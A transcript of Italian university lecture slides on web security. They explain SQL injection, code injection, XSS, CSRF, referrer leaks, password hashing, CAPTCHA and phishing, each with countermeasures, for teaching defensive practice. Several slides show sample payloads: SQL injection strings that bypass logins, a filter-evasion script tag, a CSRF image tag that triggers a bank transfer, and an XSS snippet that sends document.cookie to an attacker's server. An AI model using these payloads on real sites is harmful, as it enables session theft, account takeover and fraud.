Laboratorio di reti II: Problematiche di sicurezza delle reti

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "Laboratorio di reti II: Problematiche di sicurezza delle reti"

Transcript

1 Laboratorio di reti II: Problematiche di sicurezza delle reti Stefano Brocchi 30 maggio, 2008 Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

2 La sicurezza nelle reti Nella programmazione web è necessario tenere sempre presenti problematiche di sicurezza Utenti malevoli possono tentare di attaccare applicazioni web per ottenere vantaggi per se o anche solo per causare danni Esistono numerose problematiche da considerare sia per siti web che per altre applicazioni Nel progettare un applicazione è necessario pensare alle possibili debolezze e a come prevenire i relativi attacchi Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

3 Entità di una minaccia Per determinare l entità di una minaccia, considerare i seguenti fattori: La facilità con cui l attacco può essere messo in pratica L entità del danno che è possibile provocare A seconda del tipo di applicazione, è opportuno realizzare diversi livelli di sicurezza Per esempio è importante che in un applicazione di e-commerce non ci debba essere alcuna debolezza. In un applicazione meno cruciale qualche buco che non può portare a grossi danni e che è difficilmente sfruttabile da un attaccante potrebbe essere un problema perdonabile Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

4 Implementare la sicurezza web Quando si realizza la sicurezza in un sito web, si deve cercare quindi il giusto bilanciamento tra sicurezza, usabilità e tempo impiegato per l implementazione In ogni caso è necessario considerare le varie minacce per poter valutare i rischi che si corrono e le eventuali conseguenze di un attacco Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

5 Proprietà da salvaguardare Alcune caratteristiche di un applicazione web che vanno tutelate da problemi di sicurezza sono le seguenti: Integrità dei dati, sia dell applicazione stessa che quelli contenuti nella macchina dove viene eseguita Riservatezza: i dati privati relativi ad un utente o più in generale informazioni contenute sulla macchina contenente l applicazione devono restare riservati Rispetto delle autorizzazioni: un utente non deve avere la possibilità di eseguire operazioni che non è autorizzato ad eseguire, o di eseguirle a nome di altri Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

6 Sicurezza a più livelli Spesso per garantire la sicurezza si effettuano controlli a più livelli dell applicazione In altre parole, un modulo dell applicazione non accetta automaticamente i dati provenienti da un altro modulo ma effettua un ulteriore controllo Un tipico esempio è quello di eseguire controlli sulla correttezza dei dati sia nel codice lato server che come vincoli del database Questi meccanismi vengono ampiamente sfruttati soprattutto, ma non solo, per le applicazioni dove la sicurezza è un fattore critico Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

7 Sicurezza lato utenti Molte problematiche di sicurezza possono essere risolte se l utente che fa uso del sito o dell applicazione prende determinate precauzioni E tuttavia sbagliato presupporre che tuti gli utenti ne siano a conoscenza: implementando un sito web si deve tutelare la sicurezza anche degli utenti meno esperti Cercare di effettuare più controlli possibile per la sicurezza lato applicazione Un esempio: molte webmail hanno un antivirus incorporato, nonostante molti utenti più esperti effettuerebbero comunque per conto loro un controllo per virus o diffiderebbero da allegati sospetti Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

8 Gestione degli accessi e cookie Nei siti web gli accessi vengono solitamente gestiti tramite chiavi di sessione contenute lato client in un cookie Se un attaccante si appropria quindi di una chiave di sessione in un cookie di un determinato utente, questo può accedere al relativo sito come se fosse l utente vittima Così si possono verificare molteplici problemi di sicurezza, come la visualizzazione di informazioni private, l acquisizione di privilegi e permessi o l effettuazione di operazioni a nome di un altro utente Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

9 Code injection Code injection Una delle problematiche relative a siti web riguarda i casi dove del codice inserito da utente viene inserito in del codice da eseguire Un attaccante può avere la possibilità di iniettare del codice maligno che verrà eseguito Uno dei casi più comuni è quello dell SQL injection Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

10 Code injection SQL injection Consideriamo il caso di un login implementato in PHP L utente inserirà nome utente e password in una form, ed il codice PHP estrarrà i parametri ricevuti (solitamente in POST) Per verificare che il login sia corretto, spesso viene controllato se una query come la seguente ottiene risultati: "SELECT * FROM users WHERE username= $user AND password= $pass "; Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

11 Code injection SQL injection Il problema con un implementazione di questo tipo è che i dati sottomessi da un utente possono venir interpretati ed eseguiti come codice SQL Un attaccante che sospetti che l implementazione del sito sia stata realizzata in questo modo,potrebbe inserire come password per garantirsi l accesso la stringa x or 1=1 La query SQL inviata al database sarebbe in questo caso SELECT * FROM users WHERE username= anyusername AND password= x OR 1=1 ; Che restituisce tutta la tabella users visto che la condizione 1=1 è sempre verificata Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

12 Code injection SQL injection In questo caso, presupponendo sempre che il codice lato server non contenga troppi controlli, solitamente viene ottenuto l accesso con l utente relativo alla prima riga della tabella Con un po di tentativi per indovinare i nomi delle colonne, si può ottenere l accesso con uno specifico utente inserendo come password una stringa del tipo x OR username= admin Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

13 Code injection SQL injection Considerando che è possibile creare query annidate e, in alcuni server, inviare molteplici query al server SQL separate da un ;, tramite SQL injection si può inviare pressochè qualsiasi query al DB Un esempio da non provare: xkcd.com Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

14 Code injection SQL injection: soluzione Soluzione al problema dell SQL injection: validare qualsiasi input da utente che andrà a finire come parte di una query SQL Esistono numerosi metodi in molti linguaggi per imporre che una stringa non possa provocare comportamenti anomali Per esempio, inserendo dei caratteri di escape per ogni carattere speciale che può essere interpretato dal linguaggio (nell esempio, l apice) Altrimenti, si possono accettare come input solo stringhe con caratteri alfanumerici o trattini Per questo spesso in nomi utenti e password non sono permessi caratteri speciali come asterischi o apici Per maggiore sicurezza, è oppurtuno accedere al DB dall applicazione web con un utente con diritti ristretti Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

15 Code injection Code injection: PHP o JSP Un altro esempio di code injection si può verificare quando un sito permette di sottomettere codice HTML che verrà poi visualizzato Per esempio in molti forum viene permesso di inserire nei post codice HTML per permettere una formattazione ed un aspetto del testo configurabile Il problema si pone anche quando all utente viene permesso di eseguire l upload di un file che poi verrà pubblicato in rete In questo caso può essere possibile inserire codice PHP o JSP che poi verrà eseguito dal server quando la pagina contenente il codice viene richiesta Per esempio sarebbe possibile sottomettere <?php function evilfunction() {... } evilfunction();?> Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

16 Code injection Code injection: PHP o JSP Soluzione: come per l SQL injection, validare ogni input da utente Sostituire ad esempio ad ogni simbolo < la sequenza di escape < Può essere inoltre una buona idea eseguire il server web da un utente con permessi limitati, in modo che anche nel caso qualche falla di sicurezza sfugga al controllo il danno provocato sia limitato Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

17 Code injection Code injection: problematiche Per probletatiche di code injection non è sufficiente eseguire validazioni lato client tramite Javascript o Applet Non si ha mai il controllo del lato client: un utente malevolo può manipolare liberamente i parametri in uscita tramite vari programmi Per lo stesso motivo, non è sufficiente limitare le scelte nei form tramite menu a tendina, se poi non ci sono opportuni controlli lato server Una volta che il lato server è ben implementato, controlli lato client sono comunque molto utili in quanto permettono ad un utente di correggere dati non validi senza ricaricare tutta la pagina Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

18 Cross site scripting Problematiche di sicurezza delle reti Code injection Un altra problematica di code injection più sottile è il cross site scripting (XSS) Questa si può verificare quando si può sottomettere codice HTML in un sito che verrà visualizzato da altri utenti Questo succede per esempio nei forum ma anche nelle caselle di posta consultabili via web, in quanto nelle è consentito il codice HTML Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

19 Cross site scripting Cross site scripting L obiettivo del XSS tipicamente è quello di appropriarsi del cookie di accesso di un utente al sito in questione Il codice Javascript eseguito ha accesso ai cookie del sito stesso Al codice JS non viene permesso di collegarsi ad altri siti se non quello di origine, ma il browser può essere indotto ad inviare dati ad un terzo sito tramite determinati tag HTML come IMG Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

20 Cross site scripting Cross site scripting Tramite il tag IMG è necessariamente permesso l accesso a immagini su altri domini Per ottenere i cookie di un utente, avendo a disposizione un dominio è possibile usare un codice simile al seguente: <script type= text/javascript > document.write("<img src= + document.cookie + " >"); </script> Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

21 Cross site scripting Cross site scripting A questo punto il server può salvare il valore del cookie ed inviarlo all attaccante che può accedere al sito bersaglio con le credenziali della vittima Può essere implementato uno script che salvi il parametro in GET prima di restituire l immagine, oppure semplicemente il valore del cookie può essere letto nel log delle richieste del server Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

22 Cross site scripting Cross site scripting: soluzioni Soluzioni per il cross site scripting: Per siti che premettono di inserire HTML, non permettere l inserimento di tag <SCRIPT> Eseguire controlli di validazione accurati. Rimuovere tutte le occorrenze di <SCRIPT> per esempio non è sufficiente: l attaccante potrebbe inserire la stringa <SCR<SCRIPT>IPT> Nelle mail in HTML, non permettere l esecuzione di script oppure negare l accesso a immagini esterne al sito Per una maggiore sicurezza, cambiare periodicamente il valore del cookie utilizzato per l accesso alla sessione Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

23 Cross site request forgery Cross-site request forgery Un altro tipo di attacco simile al XSS è il cross-site request forgery (CSRF, letto Sea-Surf) Questo tipo di attacco punta a far eseguire delle operazioni a cui non si avrebbe accesso ad un utente autorizzato I presupposti necessari sono i seguenti Si ha la possibilità di sottomettere codice HTML ad una vittima tramite mail o siti vulnerabili che lo permettono La vittima possiede un cookie che permette l accesso ad una risorsa al quale l attaccante vuole accedere Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

24 Cross site request forgery Cross-site request forgery Di nuovo, tramite il tag IMG si induce la vittima a mandare richieste HTTP formulate dall attaccante ad un terzo sito Tali richieste rappresentano l azione che l attaccante vuole realizzare tramite le autorizzazioni concesse alla vittima Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

25 Cross site request forgery Cross-site request forgery Un esempio di CSRF. L utente A è loggato al sito per l accesso alle sue operazioni bancarie Il sito contiene un form per i versamenti che alla sottomissione dei dati richiede una pagina del tipo importo=...&destinatario=... L utente B invia ad A una mail con il codice <IMG src= versamento?importo=1000e&destinatario=b > Quando A leggerà la mail, il browser invierà una richiesta HTTP alla pagina web indicata cercando di caricare l immagine Il sito rileverà tramite il cookie che la richiesta arriva da A ed autorizzerà l operazione Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

26 Cross site request forgery Cross-site request forgery: soluzioni Soluzioni contro il CSRF: Come per il XSS, non permettere in forum e webmail la visualizzazione di immagini esterne al sito Impostare la durata dei cookie di accesso ad un tempo limitato Nei form che permettono operazioni importanti, inserire un campo hidden generato a caso ad ogni richiesta; nella pagina sucessiva, autorizzare l operazione solo se sia il cookie sia il parametro nascosto corrispondono Lato utente, eseguire il logout da siti sensibili prima di visitare forum o webmail che si sospetta siano mal implementati Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

27 Problematiche relative all HTTP-referer Problematiche relative al referrer Altre problematiche esistenti sono causate dal campo di intestazione HTTP HTTP-referer Questo campo della richiesta HTTP viene impostato al valore dell URL dal quale è stata fatta la richiesta dalla nuova URL Se in un URL A un utente clicca un link alla URL B, la richiesta HTTP per questo secondo indirizzo conterrà come HTTP-referer l URL A Lo stesso vale per richieste di immagini all interno di una pagina web. Il controllo di questo campo viene a volte utilizzato per impedire l accesso ad una immagine al di fuori del contesto di una determinato sito Questo campo spesso viene utilizzato per sapere da dove arriva il traffico diretto verso il proprio sito Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

28 Problematiche relative all HTTP-referer Problematiche relative al referrer Il campo referrer può causare diversi problemi di filtraggio di informazioni Nel caso l identificativo di sessione di un sito sia propagato tramite GET, questo facendo parte dell URL viene inviato nel campo HTTP-referer ed un sito maligno lo può intercettare e farne uso In alcuni casi si possono generare problemi di privacy, in quanto ad un sito vengono inviate informazioni relative ad una visita ad un altro sito da parte di un utente Sempre nel caso di forum e webmail per esempio, se l URL contiene un identificativo relativo al nome utente grazie ad un immagine esterna si può sapere quali utenti hanno visualizzato la mail (o il post) e quali no Tecnica a volte usata da spammer per capire quali siano le caselle attive Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

29 Problematiche relative all HTTP-referer Problematiche relative al referrer Soluzioni alle problematiche relative al referrer: Se l ID di sessione viene passato tramite GET, cambiarne il valore tra una richiesta e l altra Lato utente, fare attenzione ai link cliccati se l URL contiene informazioni sensibili Ulteriormente, si può evitare di specificare il campo HTTP-referer nelle proprie richieste HTTP tramite apposite impostazioni del browser Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

30 Riservatezza di password Riservatezza delle password nel DB A volte è necessario salvare le password degli utenti in un database ma si vuole impedire che anche persone che hanno accesso al DB (come il personale tecnico) non possano vedere le password Sebbene questa tipologia di persone ha possibilità di maneggiare il database, in certi casi l appropriazione della password può essere una minaccia maggiore Per esempio una modifica del database è rilevabile più facilmente e grazie ai vari log si può solitamente risalire all utente che la ha effettuata. Ottenendo una password invece si può impersonare un altro utente del sistema in modo anonimo Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

31 Riservatezza delle password nel DB Riservatezza di password nei DB: funzioni hash Il problema si risolve tramite l uso di funzioni hash Una funzione hash prende come argomento una stringa e ne restituisce un altra (di solito di lunghezza fissata) che gode delle seguenti proprietà: Data una qualsiasi stringa in uscita dalla funzione, non si conosce alcun modo efficiente per trovare una stringa in entrata corrispondente Le possibilità di comparire delle varie stringhe in uscita sono approssimativamente uguali Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

32 Riservatezza delle password nel DB Riservatezza di password nei DB: funzioni hash Funzioni hash molto note sono MD5 e SHA. Librerie per calcolarle sono fornite per numerosi linguaggi di programmazione Spesso le funzioni hash sono anche utilizzate per verificare l integrità di pacchetti software Per verificare che un pacchetto software distribuito su vari domini estranei al programma non sia stato alterato, viene fornito un codice hash che consente all utente di verificarne l autenticità Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

33 Riservatezza delle password nel DB Riservatezza di password nei DB: soluzione A questo punto, la soluzione al problema è di memorizzare nel database non la password stessa ma il risultato della funzione ad essa applicata Quando un utente richiede un login con una determinata password, si verifica se l hash della password ed il valore nel database corrispondano Con questa tecnica anche vedendo il database non si ha nessuna informazione sulle password usate Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

34 Uso di captcha Problematiche di accesso automatico Un altra problematica di molti siti è di evitare l accesso automatizzato da parte di programmi Si può desiderare per esempio che un numero molto grande di utenti fittizzi vengano registrati automaticamente Può essere inoltre necessario prevenire tentativi di accesso non autorizzati tramite attacchi a forza bruta ad una password da parte di programmi Sebbene tentare tutte le password di una lunghezza abbastanza grande sia proibitivo, questo attacco potrebbe aver successo nei riguardi di password brevi o deboli con l ausilio di un dizionario di password frequenti Una soluzione potrebbe essere di bloccare l account dopo n tentativi, ma questo impedirebbe l accesso anche a chi ne ha diritto Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

35 Uso di captcha CAPTCHA Per risolvere questo problema sono stati creati i CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) Questi consistono in caratteri opportunamente distorti e confusi visualizzati in un immagine che gli attuali programmi non sanno riconoscere Un utente verrà quindi identificato come umano solo se riconosce correttamente la scritta del captcha. Per ogni accesso dovrà essere generata chiaramente una diversa immagine Non tutti i CAPTCHA in circolazione sono inattaccabili, in quanto alcuni possono venir effettivamente decifrati da alcune tecniche. Fidarsi del tutto quindi solo di CAPTCHA opportunamente testati Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

36 Uso di captcha Attacco ai CAPTCHA E stata provata una tecnica per l aggiramento dei CAPTCHA basata sull appoggio su di un altro sito web complice basato sul seguente meccanismo Il programma per l accesso automatizzato richiede l operazione proibita e riceve un CAPTCHA da decifrare Il programma invia il CAPTCHA al sito complice, che richiederà ad uno dei suoi utenti di decifrare il CAPTCHA per poter accedere a del contenuto Se l utente inserisce il codice, il programma lo invierà al sito attaccato ottenendo l accesso Questo tipo di attacco comunque non viene considerato grave in quanto il numero di accessi che si riesce ad ottenere non si avvicina all ordine di grandezza degli accessi possibili tramite una procedura del tutto automatizzata Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

37 Segretezza delle comunicazioni Segretezza delle comunicazioni Un altra problematica della programmazione di reti è quella della segretezza delle comunicazioni Tutto quello che viaggia nella rete da una macchina all altra può essere potenzialmente intercettato e letto Per dati sensibili, è necessario un sistema di crittografia che renda l informazione illeggibile da terzi Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

38 Segretezza delle comunicazioni Uso di protocolli criptati Per questo scopo sono stati creati dei protocolli modificati che fanno uso di algoritmi crittografici Per quanto riguarda HTTP, esiste il protocollo HTTPS. Questo fa uso di HTTP e TCP ma interpone tra questi due un protocollo di cifratura delle informazioni Un altro esempio di protocollo sicuro è SFTP per il trasferimento sicuro dei file Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

39 Phishing Phishing Il phishing è un tentativo di ottenere informazioni riservate di un utente facendogli credere di avere a che fare con un sito affidabile Solitamente si ottiene mascherando un URL ad un sito con un altra. Il sito destinazione potrebbe essere una copia del sito originale in modo da indurre l utente ad inserire dati personali (username e password, numero di carta di credito...) Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

40 Phishing Modalità del phishing Esistono diversi modi per mascherare un URL con un altra. Il più semplice è inserire nel contenuto del tag <a> un link diverso da quello puntato. <a href= >www.sitobuono.com</a> Un altro modo è di utilizzare la chiocciola, che in un URL specifica il nome dell utente. Visto che solitamente non è un informazione necessaria, tutto quello che la precede viene solitamente scartato Se l URL è molto lunga, il sito finale potrebbe non esere facilmente visibile <a href= Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

41 Phishing Modalità del phishing Un altro modo per effettuare il fishing è di utilizzare delle pagine in alcuni siti che effettuano automaticamente una redirezione ad un altro sito specificato tra i parametri Tali pagine vengono a volte utilizzate per conteggiare il numero di click effettuati sui vari link esterni, per esempio fare delle statistiche Es. Per nascondere ulteriormente il vero link, questo a volte viene codificato tramite i caratteri di escape dell HTML Ancora: un sottodominio di un sito malvagio può essere confuso con un dominio affidabile da un utente inesperto, come nell URL >...</a> Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

42 Phishing Phishing: soluzioni Soluzioni al phishing: fortunatamente, molti browser implementano meccanismi che riconoscono se l indirizzo di un link è sospetto e lo segnalano all utente Un altra soluzione è di inviare i link cliccati ad un autorità che esegue questa verifica in remoto Da questa soluzione possono nascere problemi di privacy... Mail che contengono tentativi di phishing vengono spesso individuate dai server di posta o da alcuni antivirus e segnalate come pericolose all utente In alcuni casi, è comunque necessaria dell accortezza lato utente Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

43 Esercizio Esercizio Analizzare le possibili minacce che possono essere messe in atto sul sito del forum Per ognuna di esse, valutare quanto gravi possono essere le conseguenze e con quanta difficoltà la minaccia può essere messa in atto Risolvere i problemi di sicurezza ritenuti più gravi secondo la precedente analisi, facendo in modo che questo pesi meno possibile sulle funzionalità del sito Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

Attacchi alle applicazioni web: SQL injection e Cross-site scripting (XSS)

Attacchi alle applicazioni web: SQL injection e Cross-site scripting (XSS) UNIVERSITÀ DEGLI STUDI DI CATANIA Facoltà di Ingegneria Corso di laurea Specialistica in Ingegneria Informatica Tesina di Sicurezza nei Sistemi informativi Simona Ullo Attacchi alle applicazioni web: SQL

Dettagli

Analisi di vulnerabilità e prevenzione di attacchi SQL injection e Cross-site Scripting

Analisi di vulnerabilità e prevenzione di attacchi SQL injection e Cross-site Scripting Pattern Recognition and Applications Lab Analisi di vulnerabilità e prevenzione di attacchi SQL injection e Cross-site Scripting Dott. Ing. Igino Corona igino.corona (at) diee.unica.it Corso Sicurezza

Dettagli

DATABASE IN RETE E PROGRAMMAZIONE LATO SERVER

DATABASE IN RETE E PROGRAMMAZIONE LATO SERVER DATABASE IN RETE E PROGRAMMAZIONE LATO SERVER L architettura CLIENT SERVER è l architettura standard dei sistemi di rete, dove i computer detti SERVER forniscono servizi, e computer detti CLIENT, richiedono

Dettagli

Application Assessment Applicazione ARCO

Application Assessment Applicazione ARCO GESI Application Assessment Applicazione ARCO Milano Hacking Team S.r.l. http://www.hackingteam.it Via della Moscova, 13 info@hackingteam.it 20121 MILANO (MI) - Italy Tel. +39.02.29060603 Fax +39.02.63118946

Dettagli

Application Assessment Applicazione ARCO

Application Assessment Applicazione ARCO GESI Application Assessment Applicazione ARCO Versione 2 Milano 14 Luglio 2006 Hacking Team S.r.l. http://www.hackingteam.it Via della Moscova, 13 info@hackingteam.it 20121 MILANO (MI) - Italy Tel. +39.02.29060603

Dettagli

Corso di Sicurezza Informatica. Sicurezza del software. Ing. Gianluca Caminiti

Corso di Sicurezza Informatica. Sicurezza del software. Ing. Gianluca Caminiti Corso di Sicurezza Informatica Sicurezza del software Ing. Gianluca Caminiti SQL Injection Sommario Premessa sul funzionamento dei siti dinamici SQL Injection: Overview Scenari di attacco: Errata gestione

Dettagli

Legenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità.

Legenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità. Legenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità. Livello di Pericolosità 3: Login Cracking: Il cracking è il

Dettagli

Esempi pratici, risultati e contromisure consigliate. Massimo Biagiotti

Esempi pratici, risultati e contromisure consigliate. Massimo Biagiotti L attività di un Ethical Hacker Esempi pratici, risultati e contromisure consigliate Massimo Biagiotti Information Technology > Chiunque operi nel settore sa che il panorama dell IT è in continua evoluzione

Dettagli

Bibliografia: Utenti e sessioni

Bibliografia: Utenti e sessioni Bibliografia: Utenti e sessioni http: protocollo stateless http si appoggia su una connessione tcp e lo scambio nel contesto di una connessione si limita a invio della richiesta, ricezione della risposta.

Dettagli

Proteggi gli account personali

Proteggi gli account personali con la collaborazione di Proteggi gli account personali Pensi che il PHISHING sia solo un tipo di pesca? Pensi che i COOKIE siano solo biscotti? Pensi che un VIRUS sia solo un raffreddore? Proteggi gli

Dettagli

Programmazione Java Avanzata

Programmazione Java Avanzata Programmazione Java Avanzata Accesso ai Dati Ing. Giuseppe D'Aquì Testi Consigliati Eclipse In Action Core J2EE Patterns - DAO [http://java.sun.com/blueprints/corej2eepatterns/patterns/dataaccessobject.html]

Dettagli

Implicazioni sociali dell informatica

Implicazioni sociali dell informatica Fluency Implicazioni sociali dell informatica Capitolo 10 Privacy I nostri corpi I nostri luoghi Le informazioni Le comunicazioni personali La privacy Con i moderni dispositivi è possibile violare la privacy

Dettagli

La Sicurezza delle Reti. La Sicurezza delle Reti. Il software delle reti. Sistemi e tecnologie per la multimedialità e telematica.

La Sicurezza delle Reti. La Sicurezza delle Reti. Il software delle reti. Sistemi e tecnologie per la multimedialità e telematica. Sistemi e tecnologie per la multimedialità e telematica Fabio Burroni Dipartimento di Ingegneria dell Informazione Università degli Studi di Siena burronif@unisi unisi.itit La Sicurezza delle Reti La presentazione

Dettagli

TeamPortal. Servizi integrati con ambienti Gestionali

TeamPortal. Servizi integrati con ambienti Gestionali TeamPortal Servizi integrati con ambienti Gestionali 12/2013 Accesso da remoto Accesso da remoto Esempio 1 Sul Firewall devono essere aperte le porte 80 : http (o quella assegnata in fase di installazione/configurazione

Dettagli

McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report

McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report Sommario Introduzione...3 Lista delle Vulnerabilità...3 Descrizione delle vulnerabilità...3 XSS...3 Captcha...4 Login...5

Dettagli

Indice. 1.13 Configurazione di PHP 26 1.14 Test dell ambiente di sviluppo 28

Indice. 1.13 Configurazione di PHP 26 1.14 Test dell ambiente di sviluppo 28 Indice 25 184 Introduzione XI Capitolo 1 Impostazione dell ambiente di sviluppo 2 1.1 Introduzione ai siti Web dinamici 2 1.2 Impostazione dell ambiente di sviluppo 4 1.3 Scaricamento di Apache 6 1.4 Installazione

Dettagli

Attacchi alle Applicazioni Web

Attacchi alle Applicazioni Web Attacchi alle Applicazioni Web http://www.infosec.it info@infosec.it Relatore: Matteo Falsetti Webbit03 Attacchi alle Applicazioni Web- Pagina 1 Applicazioni web: definizioni, scenari, rischi ICT Security

Dettagli

Attacco alle WebMail basate su Memova: tampering dei parametri di inoltro automatico

Attacco alle WebMail basate su Memova: tampering dei parametri di inoltro automatico Attacco alle WebMail basate su Memova: tampering dei parametri di inoltro automatico Rosario Valotta Matteo Carli Indice Attacco alle WebMail basate su Memova:... 1 tampering dei parametri di inoltro automatico...

Dettagli

Tecnologie per il Web. Il web: Architettura HTTP HTTP. SSL: Secure Socket Layer

Tecnologie per il Web. Il web: Architettura HTTP HTTP. SSL: Secure Socket Layer Tecnologie per il Web Il web: architettura e tecnologie principali Una analisi delle principali tecnologie per il web Tecnologie di base http, ssl, browser, server, firewall e proxy Tecnologie lato client

Dettagli

Programmazione Web. Laboratorio 4: PHP e MySQL

Programmazione Web. Laboratorio 4: PHP e MySQL Programmazione Web Laboratorio 4: PHP e MySQL Lavagna elettronica (I) Un unità aziendale di decision making opera per le decisioni di tipo consueto e ripetitivo tramite la procedura seguente: un qualsiasi

Dettagli

Siti interattivi e dinamici. in poche pagine

Siti interattivi e dinamici. in poche pagine Siti interattivi e dinamici in poche pagine 1 Siti Web interattivi Pagine Web codificate esclusivamente per mezzo dell HTML non permettono alcun tipo di interazione con l utente, se non quella rappresentata

Dettagli

SOSEBI PAPERMAP2 MODULO WEB MANUALE DELL UTENTE

SOSEBI PAPERMAP2 MODULO WEB MANUALE DELL UTENTE SOSEBI PAPERMAP2 MODULO WEB MANUALE DELL UTENTE S O. S E. B I. P R O D O T T I E S E R V I Z I P E R I B E N I C U L T U R A L I So.Se.Bi. s.r.l. - via dell Artigianato, 9-09122 Cagliari Tel. 070 / 2110311

Dettagli

TeamPortal. Infrastruttura

TeamPortal. Infrastruttura TeamPortal Infrastruttura 05/2013 TeamPortal Infrastruttura Rubriche e Contatti Bacheca Procedure Gestionali Etc Framework TeamPortal Python SQL Wrapper Apache/SSL PostgreSQL Sistema Operativo TeamPortal

Dettagli

Clicca sul link Gmail in alto nella pagina. Arriverai ad una pagina simile alla seguente: G. Pettarin ECDL Modulo 7: Internet 68

Clicca sul link Gmail in alto nella pagina. Arriverai ad una pagina simile alla seguente: G. Pettarin ECDL Modulo 7: Internet 68 G. Pettarin ECDL Modulo 7: Internet 68 Usiamo Gmail In questo capitolo vedremo come creare un proprio accesso alla posta elettronica (account) ad uno dei servizi di mail on line più diffusi: Gmail, la

Dettagli

Corso di Informatica. Prerequisiti. Modulo T3 B3 Programmazione lato server. Architettura client/server Conoscenze generali sui database

Corso di Informatica. Prerequisiti. Modulo T3 B3 Programmazione lato server. Architettura client/server Conoscenze generali sui database Corso di Informatica Modulo T3 B3 Programmazione lato server 1 Prerequisiti Architettura client/server Conoscenze generali sui database 2 1 Introduzione Lo scopo di questa Unità è descrivere gli strumenti

Dettagli

RELAZIONE DI PROGETTO DELL ESAME STRUMENTI PER APPLICAZIONI WEB

RELAZIONE DI PROGETTO DELL ESAME STRUMENTI PER APPLICAZIONI WEB RELAZIONE DI PROGETTO DELL ESAME STRUMENTI PER APPLICAZIONI WEB Studente: Nigro Carlo N.mat.: 145559 Tema: Negozio virtuale Nome sito: INFOTECH Url: http://spaw.ce.unipr.it/progetti/infotech Per il progetto

Dettagli

SICUREZZA. Sistemi Operativi. Sicurezza

SICUREZZA. Sistemi Operativi. Sicurezza SICUREZZA 14.1 Sicurezza Il Problema della Sicurezza Convalida Pericoli per i Programmi Pericoli per il Sistema Difendere i Sistemi Scoperta di Intrusioni Cifratura Esempio: Windows NT 14.2 Il Problema

Dettagli

Sistemi Operativi SICUREZZA. Sistemi Operativi. D. Talia - UNICAL 14.1

Sistemi Operativi SICUREZZA. Sistemi Operativi. D. Talia - UNICAL 14.1 SICUREZZA 14.1 Sicurezza Il Problema della Sicurezza Convalida Pericoli per i Programmi Pericoli per il Sistema Difendere i Sistemi Scoperta di Intrusioni Cifratura Esempio: Windows NT 14.2 Il Problema

Dettagli

Navigazione automatica e rilevazione di errori in applicazioni web

Navigazione automatica e rilevazione di errori in applicazioni web Politecnico di Milano Navigazione automatica e rilevazione di errori in applicazioni web Relatore: Prof. Stefano Zanero Fabio Quarti F e d e r i c o V i l l a A.A. 2006/2007 Sommario Obiettivo: Illustrare

Dettagli

--- PREMESSE INTRODUZIONE. .:luxx:.

--- PREMESSE INTRODUZIONE. .:luxx:. SQL INJECTION --- SICUREZZA.:luxx:. PREMESSE Questa guida accenna ad alcuni metodi di SQL injection e si sofferma sulla prevenzione di tali attacchi, per comprendere al meglio il testo è necessaria una

Dettagli

Concetti base. Impianti Informatici. Web application

